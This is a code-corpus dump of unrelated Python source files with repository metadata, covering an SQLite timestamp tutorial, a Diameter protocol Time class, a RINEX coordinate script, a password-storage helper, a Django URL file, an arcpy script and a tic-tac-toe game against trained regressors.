# ('2018-07-04 14:14:31.203132+00:00', 'John', 1010)
# ('2018-07-04 14:14:31.353149+00:00', 'John', 10)
# ('2018-07-04 14:14:31.509387+00:00', 'John', 10)
# ==========================================================================
# We can confirm that the timestamp is in string format by using this code
import sqlite3
db = sqlite3.connect("accounts.sqlite")
for row in db.execute("SELECT * FROM history"):
local_time = row[0]
print("Time = {}: Format = {}".format(local_time, type(local_time)))
db.close()
# When we run above code we get this result showing timestamp is in string format
# Time = 2018-07-04 14:14:31.203132+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.353149+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.509387+00:00: Format = <class 'str'>
# NOTE that we can convert these string types into DATETIME values by importing the DATETIME module
# and using the strptime method of the DATETIME module.
# you can find this in documentation if you want to use it.
# There is a gotcha on this which we will mention later, but as long as we use python documentation
# and Not the SQLITE datetime documentation, we will be fine
# ====================================================================
#
# We have used the python sqlite3 timestamp column type for out times and this relies on the fact that
# the sqlite3 library can examine custom datatypes per column and respond to types that it knows about
# it is possible to define and register your own data types but the "date" and "timestamp" type have already been registered for us.
# So we just need to tell sqlite3 to respond to them.
# we do that by passing PARSE_DECLTYPES when we create the connection
import sqlite3
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
local_time = row[0]
print("Time = {}: Format = {}".format(local_time, type(local_time)))
db.close()
# When you run above code, the PARSE_DECLTYPES is supposed to convert the string into "datetime" but in my case
# am still getting class string
# Time = 2018-07-04 14:14:31.203132+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.353149+00:00: Format = <class 'str'>
# Time = 2018-07-04 14:14:31.509387+00:00: Format = <class 'str'>
# For more information on Adapters and converters, check this link on section 12.6.2.2.2
# https://docs.python.org/3/library/sqlite3.html
# https://docs.python.org/3/library/sqlite3.html#using-adapters-to-store-additional-python-types-in-sqlite-databases
# ===========================================================
# This PARSE_DECLTYPES does not handle timezone aware dates
# you can see results above look like ==> Time = 2018-07-04 14:14:31.203132+00:00:
# The end has +00.00 which shows not timezone variation (either plus or minus)
# we can confirm this by modifying "rollback5.py" to include timezone and then we will see this code will not show timezone
# Now to go "rollback5.py"
import sqlite3
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
local_time = row[0]
print("Time = {}: Format = {}".format(local_time, type(local_time)))
db.close()
# After making the timezone changes in rollback5.py, we come and run this and get this result
# We are getting the format "datetime" and we also have no timezone as expected.
# Time = 2018-07-04 10:00:49.391110: Format = <class 'datetime.datetime'>
# Time = 2018-07-04 10:00:49.481968: Format = <class 'datetime.datetime'>
# Time = 2018-07-04 10:00:49.570322: Format = <class 'datetime.datetime'>
# ================================================
# How to retrieve timezones
# ================================================
# There is no reliable standard python libraries to parse with datetime values
# However there are additional libraries to help you retrieve timezones.
# we can search for "python dateutil latest version" and get this link
# https://pypi.org/project/python-dateutil/
# ===============================================
# METHOD_1: To display localtime
# ===============================================
# Note that we first go back to rollback6.py and make changes to _current_time so it does not use "astimezone"
import sqlite3
import pytz
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"):
utc_time = row[0] # Retrieves UTC time
local_time = pytz.utc.localize(utc_time).astimezone() # Converts UTC time to localtime
print("UTC Time = {}: Local Time = {}".format(utc_time, local_time)) # Display both UTC time and Local time
db.close()
# When we run this code, we now get UTC time and Local time in this format
# its now 3.23 PM UTC time (15:23) and 10.23 AM Central time (my local time)
# UTC Time = 2018-07-04 15:23:32.362647: Local Time = 2018-07-04 10:23:32.362647-05:00
# UTC Time = 2018-07-04 15:23:32.451843: Local Time = 2018-07-04 10:23:32.451843-05:00
# UTC Time = 2018-07-04 15:23:32.529392: Local Time = 2018-07-04 10:23:32.529392-05:00
# ===================================================================
# METHOD_2: To display localtime using "sqlite3 strftime function":
# ===================================================================
# We will look at an alternative way to show time in UTC timezone.
# The other way of doing this is to use "sqlite datetime functions" and perform a conversion before getting data from server
# NOTE we don't need to import pytz
# NOTE: if you get a message that "sqlite dialect is not configured" when you hover over the select statement, you can correct this by:
# File > Settings > Search for sql > Select SQL dialect > choose checkdb.py and select sqlite next to it.
# In my version of intellij, I don't see this problem and there is no SQL dialect. So we ignore it.
# Here the SELECT query uses the strftime function to convert the time field into a string.
# "%Y-%m-%d %H:%M:%f" is the parameter that gives the format that datetime will be produced. year, month, day, hour, minute, fractional second (SS:SSS)
# SQLite datetime functions are documented here
# https://www.sqlite.org/lang_datefunc.html
# "history.time" provides a time value from the time column of the history table.
# "localtime" is the modifier to cause the UTC time to be converted to local time
# NOTE that instead of using "strftime" we can use "datetime", but make sure to refer to above link to get correct parameters for datetime function
import sqlite3
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT strftime('%Y-%m-%d %H:%M:%f', history.time, 'localtime') AS localtime,"
"history.account, history.amount FROM history ORDER BY history.time"):
print(row)
db.close()
# When we run above code, we get results as follows.
# you can see the dates are now in local time
# ADVANTAGE of this method is that it will work with whatever client is being used to access the database.
# So we could create a view in that select statement and users will be able to view data in their local time
# ('2018-07-04 10:23:32.362', 'John', 1010)
# ('2018-07-04 10:23:32.451', 'John', 10)
# ('2018-07-04 10:23:32.529', 'John', 10)
# ('2018-07-04 10:23:32.630', 'John', -30
# ===============================================
# Creating a VIEW for this query
# ==============================================
# We will create a view in rollback6.py by copying code below and adding it to rollback6.py
# db.execute("SELECT strftime('%Y-%m-%d %H:%M:%f', history.time, 'localtime') AS localtime,"
# "history.account, history.amount FROM history ORDER BY history.time"):
# After modifying rollback6.py and running it to create a view, we can query the view here using this code.
# import sqlite3
#
# db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
#
# for row in db.execute("SELECT * FROM localhistory"):
# print(row)
#
# db.close()
# When we run this code, we get these results which are similar to the ones we got from previous code.
# It is showing results in local time
# ('2018-07-05 15:08:15.802', 'John', 1010)
# ('2018-07-05 15:08:15.937', 'John', 10)
# ('2018-07-05 15:08:16.101', 'John', 10)
# ('2018-07-05 15:08:16.233', 'John', -30)
# =====================================================
# Checkdb to run solution 3 of Challenge
# ======================================================
import sqlite3
import pytz
import pickle
db = sqlite3.connect("accounts.sqlite", detect_types=sqlite3.PARSE_DECLTYPES)
for row in db.execute("SELECT * FROM history"): # we select from history table
utc_time = row[0]
pickled_zone = row[3]
zone = pickle.loads(pickled_zone) # we pickle the data using pickle modules "loads" function
local_time = pytz.utc.localize(utc_time).astimezone(zone) # astimezone converts UTC to its original timezone
print("UTC_TIME = {}, LOCAL_TIME = {}, LOCAL_TIME_TZINFO = {}".format(utc_time, local_time, local_time.tzinfo))
db.close()
# When we run this, we get this results
# UTC_TIME = 2018-07-06 13:42:51.050407, LOCAL_TIME = 2018-07-06 08:42:51.050407-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
# UTC_TIME = 2018-07-06 13:42:51.181332, LOCAL_TIME = 2018-07-06 08:42:51.181332-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
# UTC_TIME = 2018-07-06 13:42:51.482452, LOCAL_TIME = 2018-07-06 08:42:51.482452-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
# UTC_TIME = 2018-07-06 13:42:51.637715, LOCAL_TIME = 2018-07-06 08:42:51.637715-05:00, LOCAL_TIME_TZINFO = Central Daylight Time
| [
"mkioga@yahoo.com"
] | mkioga@yahoo.com |
32e6cd3643c1465c51b964a2220dbfde464d0360 | 7c3704db33fbf00d657457f2e380523b1e414ffa | /0.1/src/PyDccLib/avp_time.py | 647470e4c0fa759588c26d1b81a8ffc9f73be095 | [] | no_license | ganmao/Ocs-Test-Suite | 93099e3ecf0a8823734684bb3bc81a9b32175061 | 2e30ae29edb5725bafa075a5654b6d953275804b | refs/heads/master | 2020-06-04T17:07:19.207637 | 2010-12-10T03:06:20 | 2010-12-10T03:06:20 | 578,791 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,867 | py | #!/usr/bin/evn python
#-*- coding:utf-8 -*-
'''
Created on 2010-10-1
@author: zdl
'''
from avp_octetstring import OctetString
class Time(OctetString):
'''
时间格式是从OctetString AVP基本格式导出的。该字符串必须包含4个八位组,
与NTP时间戳格式的前4个字节格式相同。NTP时间戳在NTP协议规范[RFC2030]
第3章中定义。本格式描述的时间,从通用协调时间(UTC)1900年1月1日0点
开始。在UTC时间2036年二月7日6点28分16秒,时间值将溢出。SNTP规范中描述
了将时间扩展到2104年的程序,所有DIAMETER节点都必须支持该程序。
'''
def __init__(self, avp_code=0, avp_data=None, vendor_id=0,
mandatory=0, private=0, level=0, decode_buf=None,
cmd_etc_instance=None):
OctetString.__init__(self, avp_code, avp_data, vendor_id,
mandatory, private, level, decode_buf,
cmd_etc_instance)
self.avp['AVP_DATA_TYPE'] = "Time"
self.avp['AVP_TIME_STAMP'] = None
self.avp['AVP_TIME_STR'] = None
# 编码时根据传入的日期格式转化为NTP时间戳
if self.avp['AVP_CODE_STATE'] == "00":
self.avp['AVP_TIME_STR'] = self.avp['AVP_DATA']
self.avp['AVP_DATA'] = self.Time2NTPStamp(self.avp['AVP_DATA'])
self.avp['AVP_TIME_STAMP'] = self.avp['AVP_DATA']
data_length = len(self.avp['AVP_DATA'])
data_length = (data_length + 3) // 4 * 4
self.avp['AVP_CODE_OPERATOR'] = "!" + str(data_length) + "s"
# 可读格式输出模板
self.print_template = self.make_template("\
${L}AVP_CODE = [${AVP_CODE}] - ${AVP_NAME} - ${AVP_DATA_TYPE}(\"${AVP_CODE_OPERATOR}\") \n\
${L}AVP_FLAG = [${AVP_FLAG}] (VENDOR_ID(${AVP_VENDOR_ID})|MANDATORY(${AVP_MANDATORY})|PRIVATE(${AVP_PRIVATE}) \n\
${L}AVP_LENGTH = [${AVP_LENGTH}] \n\
${L}AVP_VENDOR_ID = [${AVP_VENDOR_ID}] \n\
${L}AVP_TIME_STAMP = [${AVP_TIME_STAMP}]\n\
${L}AVP_TIME_STR = [${AVP_TIME_STR}]\n\
${L}~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
self.print_detail_template = self.make_template("\
${L}${AVP_CODE_HEX}\n${L}\tAVP_CODE = [${AVP_CODE}] - ${AVP_NAME} - ${AVP_DATA_TYPE}(\"${AVP_CODE_OPERATOR}\") \n\
${L}${AVP_FLAGS_HEX}\n${L}\tAVP_FLAG = [${AVP_FLAG}] (VENDOR_ID(${AVP_VENDOR_ID})|MANDATORY(${AVP_MANDATORY})|PRIVATE(${AVP_PRIVATE}) \n\
${L}${AVP_LENGTH_HEX}\n${L}\tAVP_LENGTH = [${AVP_LENGTH}] \n\
${L}${AVP_VONDER_HEX}\n${L}\tAVP_VENDOR_ID = [${AVP_VENDOR_ID}] \n\
${L}${AVP_DATA_HEX}\n\
${L}\tAVP_TIME_STAMP = [${AVP_TIME_STAMP}]\n\
${L}\tAVP_TIME_STR = [${AVP_TIME_STR}]\n\
${L}~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
self.simple_print_template = self.make_template("${L}${AVP_NAME}(${AVP_CODE}) = [${AVP_DATA}]")
def decode_data(self, offset=8):
'''解码AVP包体数据
返回本次解码AVP包的总长度
'''
self._reset_operator_type()
(self.avp['AVP_DATA'],) = self.unpack_from_bin(self.avp['AVP_CODE_OPERATOR'],
self.avp['AVP_BUF'],
offset)
self.avp['AVP_DATA_HEX'] = self.avp['AVP_BUF'][offset:]
self.avp['AVP_TIME_STAMP'] = float(self.avp['AVP_DATA'])
# Time类型需要将时间戳转为可读格式
self.avp['AVP_DATA'] = self.NTPStamp2Time(self.avp['AVP_TIME_STAMP'])
self.avp['AVP_TIME_STR'] = self.avp['AVP_DATA']
return self.avp['AVP_LENGTH']
| [
"zdl0812@163.com"
] | zdl0812@163.com |
93c1d8871bbceebf7b99803b4d0dd754695de719 | 7051493bec7aa84ee3ec937243d1987193d98b7e | /jphouse/tools/SaveImg.py | 0ec029068ea28749adb5f4ecba75d6895c01e65a | [] | no_license | iqhighest/jphouse | 66927425ef50e53398a678334964743090758802 | 033b3095115efe26f2ba449434d6c021f66534a8 | refs/heads/master | 2021-01-20T10:18:25.062374 | 2017-05-05T07:20:03 | 2017-05-05T07:20:03 | 90,342,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | # -*- coding: UTF-8 -*-
import os, urllib, uuid
# 生成一个文件名字符串
def generateFileName():
return str(uuid.uuid1())
# 根据文件名创建文件
def createFileWithFileName(localPath, fileName):
if not os.path.exists(localPath):
os.makedirs(localPath)
totalPath = localPath + '\\' + fileName
if not os.path.exists(totalPath):
file = open(totalPath, 'a+')
file.close()
return totalPath
# 根据图片的地址,下载图片并保存在本地
def getAndSaveImg(imgUrl, localPath):
if (len(imgUrl) != 0):
fileName = generateFileName() + '.jpeg'
urllib.request.urlretrieve(imgUrl, createFileWithFileName(localPath, fileName))
| [
"steven.zhang@sunupper.com"
] | steven.zhang@sunupper.com |
3860977d2d8cb813df4d0cf26ed29f9e52f423e6 | ab0d188eea448e7a6b045d86ced1ba8b33697ff3 | /rinexXYZStandardization.py | 5df704bd2741bcff9ce315cc93a5d0381dbb49f0 | [] | no_license | zzhmy/RINEX | 1a2b2dad4c24a432602428816abfb701de87dcd0 | 84e0f5dede2e7b3a45cfbe3cb464c7d25d216b79 | refs/heads/master | 2020-12-24T12:29:26.490286 | 2017-02-06T04:59:46 | 2017-02-06T04:59:46 | 72,994,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,633 | py | # -*- coding:utf-8 -*-
"""
这里用#-*- coding: utf-8 -*-
否则pycharm输出对汉字不支持,会出现乱码
"""
# python 2.7
# by zzh_my@163.com
"""
功能:把RINEX文件头中的XYZ坐标信息进行标准化。
采用TEQC生成的S文件进行RINEX头坐标信息的替换。
"""
import os
import shutil
import glob
import sys
# whether have teqc
print "coding by zzh_my@163.com"
print "2016-01-30\n"
documentSegment=os.path.sep ##用于返回当前平台的目录分隔符,Windows是反斜杠(\),Linux是斜杠(/)
mydir = os.getcwd() # check current directory
print "这是您当前的目录: " + mydir
# inquiry whether change directory
mydirAnswer = raw_input("你是否想改变这个目录?? n/y: ") # beloew python 3.0,function is raw_input;above python 3.0,function is input.would you want to change directory
print mydirAnswer
mydirAnswer = mydirAnswer.lower() # all change to lower-case
if mydirAnswer == 'y':
mydir = raw_input("请输入您的全目录: ") # please input your full direcorty
print "您输入的目录是: " + mydir # you input directory is
elif mydirAnswer == 'n':
print "您输入的目录是 : " + mydir
# change directory is end
os.chdir(mydir) # change directory
print "这是您的工作目录: " + os.getcwd()
# inqure whether quit,if input "y",quit
quit_inqure = raw_input("您打算退出程序吗? n/y: ")
if quit_inqure.lower() == 'y':
print "您将会退出程序"
raw_input("press <enter>") # waiting your end this
raise SystemExit
#判断是否存在TEQC
winDir = os.getenv("windir") # get windows os directory
# programHomeDir=os.getcwd() #获取脚本运行目录
programHomeDir = os.path.split(os.path.realpath(sys.argv[0]))[0] # 获取脚本所在目录
teqcDir = winDir + "\\teqc.exe" # 欲安装功能程序的目录
programHomeTeqcDir = programHomeDir + '\\teqc.exe' # 随程序包发布的功能程序
if (not (os.path.exists(teqcDir)) ):
if (os.path.exists(programHomeTeqcDir) ):
print "复制teqc和runpkr00到windows目录下。"
# (programHomeTeqcDir,teqcDdir)
shutil.copyfile(programHomeTeqcDir, teqcDir)
else:
print "不存在teqc,程序将马上退出"
raw_input("press <enter>") # waiting your end this
raise SystemExit # 出现错误
for fileName in glob.glob(r"D:\temp\teqcS\*.16o"): #win10:\
shortFileName = os.path.basename(fileName)
filePathDIR=os.path.dirname(fileName)
#生成S文件
strdos =' teqc +qc '+fileName
print "Teqc is dealing--->" + shortFileName
os.popen(strdos)
#提取S文件XYZ坐标
teqcSfile =filePathDIR + documentSegment + shortFileName[0:len(shortFileName) - 1] + 'S'
fTeqcS = open(teqcSfile, "r")
findTextXYZ = ''
flag = 1
while (flag):
text_to_line = fTeqcS.readline()
flag = flag + 1
if 'antenna WGS 84 (xyz)' in text_to_line:
flag = 0
findTextXYZ = text_to_line # find xyz line
elif flag > 100:
print '在'+teqcSfile+'文件中未找到坐标,请核对'
raise SystemExit # 出现错误
# 关闭打开的文件
fTeqcS.close()
findTextXYZ = findTextXYZ[25:66]
#利用提取的XYZ生成新的临时O文件
FileNameTEMP=filePathDIR + documentSegment +shortFileName+'.tmp'
strdos='teqc -O.px '+findTextXYZ+' ' +fileName +' > '+FileNameTEMP
os.popen(strdos)
#删除原O文件,把临时文件改名
os.remove(fileName)
os.remove(teqcSfile)
os.rename(FileNameTEMP, fileName)
print "程序运行完毕!!"
a = raw_input('按任意键结束程序!') | [
"zzh_my@163.com"
] | zzh_my@163.com |
3c12a3af2f5d134b08f1be7061c5934536e9618a | abd1a1d532b196f72b580f5f45aa0f4f90692416 | /env/bin/symilar | 976367e92deafa0639edc0b775ee3278179dbb25 | [] | no_license | woodi22/RetroPie-DB | c030f1462e44aa1ce422ba2f5dda611845c72f68 | 06b4915c0c63535a55b2860f55064fe81ad21aa1 | refs/heads/main | 2023-01-22T12:10:13.357387 | 2020-12-04T16:26:19 | 2020-12-04T16:26:19 | 317,090,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | #!/Users/isaacwood/Desktop/WebProgrammingFinalProject/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_symilar
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run_symilar())
| [
"woodi@moravian.edu"
] | woodi@moravian.edu | |
c4680034e9a9212b2d405cb3a2535216d6714528 | e94e72d81b6d526884ac76af96e1053c0c86d039 | /getpw/db.old.py | ce00699dffe54a0765cbc59e578622f2b35d90b4 | [] | no_license | fengcms/python-learn-demo | b7ba81fb5e9375d70bacd520373e5e204c8f6bc1 | f1509781ee001d5e48a8d24adc298e3e6b083d12 | refs/heads/master | 2023-03-19T02:35:51.919681 | 2022-11-23T09:37:07 | 2022-11-23T09:37:07 | 114,220,375 | 11 | 7 | null | 2023-03-13T21:50:56 | 2017-12-14T07:59:39 | Python | UTF-8 | Python | false | false | 2,376 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
##########################################################################
# Name: db.py #
# Author: FungLeo #
# Date: 2017-12-20 #
# Purpose: This program is used to generate simple or complex passwords #
# Copy: for study, prohibition of commercial use #
##########################################################################
import sqlite3
import re
import sys
from prettytable import PrettyTable
from pwlang import lang
DB_PATH = sys.path[0] + '/passwd.db'
def checkDB(db):
db.execute('''SELECT name FROM sqlite_master
WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%'
ORDER BY 1''')
o = db.fetchall()
if len(o) == 0 or not bool(re.search(r'(\'passwd\',)',str(o))):
db.execute('''CREATE TABLE passwd (
id integer primary key autoincrement,
name varchar(255),
password varchar(255),
time timestamp default current_timestamp
)''')
def insertDb(name,passwd):
conn = sqlite3.connect(DB_PATH)
c = conn.cursor()
checkDB(c)
c.execute("INSERT INTO passwd (name,password) VALUES ('" + name + "', '" + passwd + "')");
conn.commit()
conn.close()
def selectDb(pid,name):
conn = sqlite3.connect(DB_PATH)
c = conn.cursor()
checkDB(c)
select = "SELECT * from passwd "
if name:
select += ('where name LIKE \'%' + name + '%\'')
if pid:
select += ('where id = \'' + str(pid) + '\'')
select += 'ORDER BY id DESC'
res = list(c.execute(select))
if len(res) == 0:
print(lang('db_no_emp'))
else:
x = PrettyTable(['id','name','password','time'])
x.align['name'] = 'l'
x.padding_width = 1
for row in res:
x.add_row(list(row))
print(x)
conn.close()
def deleteDb(pid):
conn = sqlite3.connect(DB_PATH)
c = conn.cursor()
checkDB(c)
c.execute('DELETE from passwd where id=' + str(pid) )
conn.commit()
o = conn.total_changes
if o == 0:
print(lang('db_del_fail'))
if o == 1:
print(lang('db_del_succ_left') + str(pid) + lang('db_del_succ_right'))
conn.close()
| [
"web@fengcms.com"
] | web@fengcms.com |
380bc8c1da49f475ada2cd52d147697aadacfd3c | b0e38ce58d77e4f4e5072f64c88697803d5f0806 | /60.0 Fonksiyon sinifi.py | 0e745aae46b5e179206eab2c253d0190f13a0f84 | [] | no_license | fport/feyzli-python | eade1c856cb2eee2e26b3a517fd8ea44f3fbfc05 | e8b60d9ae7fb5c3e84be2c348a3a2df5b606f018 | refs/heads/master | 2022-11-23T07:18:17.695382 | 2020-07-22T11:40:01 | 2020-07-22T11:40:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 750 | py | def islem(islemAdi):
def toplama(*sayilar):
toplam = 0
for i in sayilar:
toplam += i
return toplam
def carpma(*sayilar):
carpim = 1
for i in sayilar:
carpim*=i
return carpim
def faktoriyelAl(faktoriyelsayi):
faktoriyel = 1
for i in range(1,faktoriyelsayi+1):
faktoriyel*=i
return faktoriyel
if islemAdi == "+":
return toplama
elif islemAdi == "*":
return carpma
else:
return faktoriyelAl
toplam = islem("+")
print(type(toplam))
print(toplam(1,2,3,4,5))
carpim = islem("*")
print(carpim(1,2,3,4,5))
fak = islem("!")
print(fak(6))
| [
"noreply@github.com"
] | noreply@github.com |
444a8b82d9035b67e5b874852d5ab470cd9f7eb7 | abab124bc7ffe34ff95e282a59c4005456a53ee3 | /mysite/urls.py | 9baac2e6c6265f10ccdff8021d63a552242a28d7 | [] | no_license | guyunhua/mysite | b35245aef059f7566838d2524a053a95a1270280 | f3a38fd7ed8ced038d7fa4562eb6704c5281b084 | refs/heads/master | 2023-05-15T09:51:59.765938 | 2021-06-09T11:53:26 | 2021-06-09T11:53:26 | 375,300,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 920 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from chunyu import views
urlpatterns = [
path('admin/', admin.site.urls),
path("", views.index, name="index"),
path("generic", views.generic, name="generic"),
path("elements", views.elements, name='elements')
]
| [
"97099101@qq.com"
] | 97099101@qq.com |
653bb7acba9a368257cf1ea6a0b12134c55742d7 | c659aa4843d7514cf5e6b26c1830ab57cf1e784c | /branch/chrisBranch/novella/novella/wsgi.py | 8f642d5f714bbc400cb6ff9291275e96aa4c4081 | [] | no_license | affanhmalik/novella | 355afdd529d0becb1ef3e47d9aae7b3e4042ed87 | 29a06f2d01e17bea6661056756be60cc91399c5f | refs/heads/master | 2020-05-14T12:08:26.260848 | 2014-07-28T03:29:50 | 2014-07-28T03:29:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | """
WSGI config for novella project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "novella.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
import sys
sys.path.append('/home/ubuntu/code/project/novella')
| [
"cniusfu2013@gmail.com"
] | cniusfu2013@gmail.com |
8369fe1e177a9529548c9c93a67aa894e39be3dc | 6dbbf8cf156cc07929f6af4deafef08feb54d5dc | /ArcGIS_Scripts/describeRasters.py | f0062567dd1892ab17bf0cf5f13f3ebe851249a8 | [] | no_license | sishui198/myGISPythonCode | 03a346c87b0a311a995b503494a9188cbe6888c0 | cb33c442b37d312678ba2ee303945b10e46b855c | refs/heads/master | 2022-02-21T01:44:39.460106 | 2018-05-06T23:59:36 | 2018-05-06T23:59:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | try:
import arcpy
from arcpy import env
env.workspace = "C:\EsriPress\Python\Data\Exercise09"
raster = "tm.img"
desc = arcpy.Describe(raster)
print "Raster baseName is: " + desc.basename
print "Raster dataType is: {0}".format(desc.dataType)
print "Raster fileExtension is: {0}".format(desc.extension)
print "Raster spatial reference is: {0}".format(desc.spatialReference.name)
print "Raster format is: {0}".format(desc.format)
print "Raster compression type is {0}".format(desc.compressionType)
print "Raster number of bands is: " + str(desc.bandCount)
except Exception , e:
str(e) | [
"noreply@github.com"
] | noreply@github.com |
d420974adf0a6be10681461db969d12898692087 | f4127951720368c12704020e4b54eb434c073528 | /HumanVsCom.py | f40059b2c19f2b830cf5f1a6b6482b58448133d7 | [] | no_license | Nayanikag/TicTacToe | 985188b35463bca43f790de19116ba5fe57234b6 | 9d266c7bfb3aa8618a34e7ad179720efe3c835df | refs/heads/main | 2023-02-09T16:01:09.524888 | 2020-12-28T16:45:34 | 2020-12-28T16:45:34 | 325,062,803 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,436 | py | '''
-----------------------Authors-------------------------
Nayanika Ghosh - 4191 4976
Disha Nayar - 6199 1035
-------------------------------------------------------
'''
import numpy as np
import pickle
class PlayHumanvsCom():
def __init__(self):
self.play()
def predict_LR(self, board):
board_lr = np.append(1, board)
weights = np.loadtxt('/Users/nghosh/Desktop/Deeplearning/LRWeights.txt')
a = weights[:1, :].T
y0_pred = np.dot(board_lr, weights[:1, :].T)
y1_pred = np.dot(board_lr, weights[1:2, :].T)
y2_pred = np.dot(board_lr, weights[2:3, :].T)
y3_pred = np.dot(board_lr, weights[3:4, :].T)
y4_pred = np.dot(board_lr, weights[4:5, :].T)
y5_pred = np.dot(board_lr, weights[5:6, :].T)
y6_pred = np.dot(board_lr, weights[6:7, :].T)
y7_pred = np.dot(board_lr, weights[7:8, :].T)
y8_pred = np.dot(board_lr, weights[8:9, :].T)
y_pred = np.array([y0_pred, y1_pred, y2_pred, y3_pred, y4_pred, y5_pred, y6_pred, y7_pred, y8_pred])
max_index = y_pred.tolist().index(np.max(y_pred))
y_pred_copy = y_pred
while (board[max_index] != 0):
y_pred_copy[max_index] = 0
max_index = y_pred_copy.tolist().index(np.max(y_pred_copy))
b = np.zeros_like(y_pred)
b[max_index] = 1
return b
def select_regressor(self):
print("Enter 1 to play against Linear Regressor")
print("Enter 2 to play against KNN Regressor")
print("Enter 3 to play against MLP Regressor")
user_input = input()
return user_input
def take_input(self):
'''
This function takes a cell number as input from the user
the cell number needs to be between 1 to 9 and should be empty
:return: string
'''
print("Enter cell number")
user_input = input()
return user_input
def decode(self, cell_value):
'''
This function decodes -1 as O and 1 as X
It is used as a helper function to display the board
:param cell_value: takes the value 0,-1 or 1
:return: None
'''
if (cell_value == 0):
return ' '
elif (cell_value == -1):
return 'O '
else:
return 'X '
def display_board(self, board=[]):
'''
This function displays the board to the user
:param board: the current state of the board
:return: None
'''
print(self.decode(board[0]) + '|' + self.decode(board[1]) + '|' + self.decode(board[2]))
print("-- -- --")
print(self.decode(board[3]) + '|' + self.decode(board[4]) + '|' + self.decode(board[5]))
print("-- -- --")
print(self.decode(board[6]) + '|' + self.decode(board[7]) + '|' + self.decode(board[8]))
print("''''''''''''''''''''''''''''''''''''''''''''''''''''''''")
def play(self):
'''
This function implements the logic to play tic tac toe with human
:return: None
'''
print("Lets Play!!!!")
regressor = self.select_regressor()
print("Enter a cell number (1 to 9)")
board = [0, 0, 0, 0, 0, 0, 0, 0, 0]
self.display_board(board)
while (board.count(0) != 0):
input_pos = self.take_input()
while ((int(input_pos) < 1 or int(input_pos) > 9) or board[int(input_pos) - 1] != 0):
print("Please enter a valid input")
input_pos = self.take_input()
board[int(input_pos) - 1] = 1
self.display_board(board)
# check if human won
if ((board[0], board[1], board[2]) == (1, 1, 1) or (board[3], board[4], board[5]) == (1, 1, 1) or (
board[6], board[7], board[8]) == (1, 1, 1) or (board[0], board[3], board[6]) == (1, 1, 1) or (
board[1], board[4], board[7]) == (1, 1, 1) or (board[2], board[5], board[8]) == (1, 1, 1) or (
board[0], board[4], board[8]) == (1, 1, 1) or (board[2], board[4], board[6]) == (1, 1, 1)):
print("human won")
break
if (board.count(0) == 0):
print("Its a Draw!!")
break
while(True):
if (int(regressor) == 1):
# predicts computers next move
# predict using Linear regression
y_pred = self.predict_LR(board)
pos_op = [i for i, val in enumerate(y_pred) if val == 1]
break
elif(int(regressor) == 2):
# predicts computers next move
# predict using KNN
KNN_model = pickle.load(open('/Users/nghosh/Desktop/Deeplearning/knnweights', 'rb'))
y_pred = KNN_model.predict(np.asarray(board).reshape(1, -1))
y_pred = np.where(y_pred > 0.5, 1, 0)
pos_op = [i for i, val in enumerate(y_pred[0]) if val == 1]
break
elif(int(regressor) == 3):
# predicts computers next move
# predict using MLP
MLP_model = pickle.load(open('/Users/nghosh/Desktop/Deeplearning/MLPWeights', 'rb'))
y_pred = MLP_model.predict(np.asarray(board).reshape(1, -1))
y_pred = np.where(y_pred > 0.5, 1, 0)
pos_op = [i for i, val in enumerate(y_pred[0]) if val == 1]
break
else:
print("Enter a valid regressor!")
predicted_move = np.random.choice(a=np.array(pos_op))
board[predicted_move] = -1
self.display_board(board)
# check if computer won
if ((board[0], board[1], board[2]) == (-1, -1, -1) or (board[3], board[4], board[5]) == (-1, -1, -1) or (
board[6], board[7], board[8]) == (-1, -1, -1) or (board[0], board[3], board[6]) == (-1, -1, -1) or (
board[1], board[4], board[7]) == (-1, -1, -1) or (board[2], board[5], board[8]) == (-1, -1, -1) or (
board[0], board[4], board[8]) == (-1, -1, -1) or (board[2], board[4], board[6]) == (-1, -1, -1)):
print("comp won")
break
